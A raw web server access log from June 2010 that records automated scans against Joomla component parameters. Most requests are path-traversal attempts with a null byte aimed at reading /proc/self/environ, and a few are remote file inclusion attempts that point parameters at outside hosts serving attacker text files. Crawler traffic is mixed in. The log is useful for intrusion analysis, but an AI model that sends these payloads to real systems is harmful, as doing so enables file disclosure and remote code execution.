188.72.70.56 - - [21/Jun/2010:00:01:52 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:02:13 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
188.72.70.56 - - [21/Jun/2010:00:02:18 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:02:18 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:02:19 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
121.78.118.123 - - [21/Jun/2010:00:03:20 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:00:03:20 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.212.56 - - [21/Jun/2010:00:03:49 -0500] "GET /logs/access_log.1274572800//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:03:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:03:50 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:04:19 -0500] "GET /logs/access_log.1274832000//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
207.46.13.48 - - [21/Jun/2010:00:05:10 -0500] "GET /logs/access_log.1230076800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.72.70.56 - - [21/Jun/2010:00:08:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:08:06 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
87.250.255.243 - - [21/Jun/2010:00:08:12 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
188.72.70.56 - - [21/Jun/2010:00:08:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:08:36 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
207.46.13.101 - - [21/Jun/2010:00:11:11 -0500] "GET /logs/access_log.1172361600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.212.56 - - [21/Jun/2010:00:11:23 -0500] "GET /logs/access_log.1274313600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
188.72.70.56 - - [21/Jun/2010:00:14:20 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:20 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:33 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:33 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:14:34 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
211.43.212.56 - - [21/Jun/2010:00:15:38 -0500] "GET /logs/access_log.1274313600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.822"
188.72.70.56 - - [21/Jun/2010:00:15:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:16:00 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:16:00 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.195.112.180 - - [21/Jun/2010:00:16:38 -0500] "GET /logs/access_log.1165881600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.72.70.56 - - [21/Jun/2010:00:16:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:16:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:16:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
205.186.131.199 - - [21/Jun/2010:00:17:28 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:00:17:36 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.73.226.136 - - [21/Jun/2010:00:17:44 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:18:07 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
125.189.64.147 - - [21/Jun/2010:00:20:00 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://zamyr.freeblogshost.in/100505/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; .NET CLR 1.1.4322)"
205.186.131.199 - - [21/Jun/2010:00:22:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:00:22:28 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
205.186.131.199 - - [21/Jun/2010:00:22:28 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:00:22:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:00:22:29 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
205.251.131.18 - - [21/Jun/2010:00:22:29 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.73.226.136 - - [21/Jun/2010:00:23:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.73.226.136 - - [21/Jun/2010:00:23:52 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.73.226.136 - - [21/Jun/2010:00:23:53 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.15.152.183 - - [21/Jun/2010:00:33:49 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:00:34:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
188.72.70.56 - - [21/Jun/2010:00:35:32 -0500] "GET /logs/access_log.1273622400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:35:32 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:35:32 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:36:48 -0500] "GET /logs/access_log.1273622400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:36:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:36:49 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
82.76.12.197 - - [21/Jun/2010:00:38:23 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:00:40:36 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.17.105.143 - - [21/Jun/2010:00:45:04 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.830"
207.46.199.179 - - [21/Jun/2010:00:46:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.17.105.143 - - [21/Jun/2010:00:46:30 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.830"
207.46.13.42 - - [21/Jun/2010:00:46:40 -0500] "GET /logs/access_log.1222732800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.48.48.157 - - [21/Jun/2010:00:50:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
188.72.70.56 - - [21/Jun/2010:00:57:15 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:16 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:30 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:30 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:30 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:31 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:31 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:32 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:00 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:01 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:01 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.15.152.183 - - [21/Jun/2010:00:58:10 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:00:58:12 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:00:58:17 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
207.46.204.197 - - [21/Jun/2010:01:03:11 -0500] "GET /logs/access_log.1159833600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.15.152.183 - - [21/Jun/2010:01:05:00 -0500] "GET /logs/access_log.1274572800//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:05:00 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:05:00 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
94.228.131.90 - - [21/Jun/2010:01:08:19 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:01:08:19 -0500] "GET /?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:01:08:19 -0500] "GET /logs/?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 200 10344 "-""Mozilla/5.0"
67.15.152.183 - - [21/Jun/2010:01:09:20 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.65"
94.228.131.90 - - [21/Jun/2010:01:10:06 -0500] "GET /logs/access_log.1274572800/?option=com_gcalendar&controller=http://ulala2.fileave.com/Ckrid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
220.181.7.103 - - [21/Jun/2010:01:10:23 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.211.149.167 - - [21/Jun/2010:01:14:00 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:14:00 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.15.152.183 - - [21/Jun/2010:01:14:09 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
203.211.149.167 - - [21/Jun/2010:01:14:39 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:14:39 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
188.72.70.56 - - [21/Jun/2010:01:14:44 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:44 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:44 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:14:59 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:00 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:00 -0500] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:15:00 -0500] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
82.76.12.197 - - [21/Jun/2010:01:15:51 -0500] "GET /logs/access_log.1274832000/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:15:51 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:15:51 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10344 "-""libwww-perl/5.831"
67.15.152.183 - - [21/Jun/2010:01:16:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:16:08 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.15.152.183 - - [21/Jun/2010:01:16:08 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.211.149.167 - - [21/Jun/2010:01:16:48 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:16:48 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:16:49 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:17:14 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:17:15 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:17:15 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:17:56 -0500] "GET /logs/access_log.1274572800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:01:18:37 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.211.129.97 - - [21/Jun/2010:01:20:21 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:01:21:11 -0500] "GET /logs/access_log.1227398400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.211.149.167 - - [21/Jun/2010:01:22:39 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:22:40 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:22:41 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.195.112.180 - - [21/Jun/2010:01:23:08 -0500] "GET /logs/access_log.1270598400 HTTP/1.0" 200 577895 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.211.149.167 - - [21/Jun/2010:01:24:00 -0500] "GET /logs/access_log.1274832000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:24:01 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:24:01 -0500] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
62.43.194.164 - - [21/Jun/2010:01:24:24 -0500] "GET /logs/access_log.1274572800%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:24:24 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.43.194.164 - - [21/Jun/2010:01:24:24 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.etowbu.com/bbs//imgs/baner.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
203.211.129.97 - - [21/Jun/2010:01:25:31 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.129.97 - - [21/Jun/2010:01:26:57 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
203.211.129.97 - - [21/Jun/2010:01:27:12 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
203.211.129.97 - - [21/Jun/2010:01:27:12 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
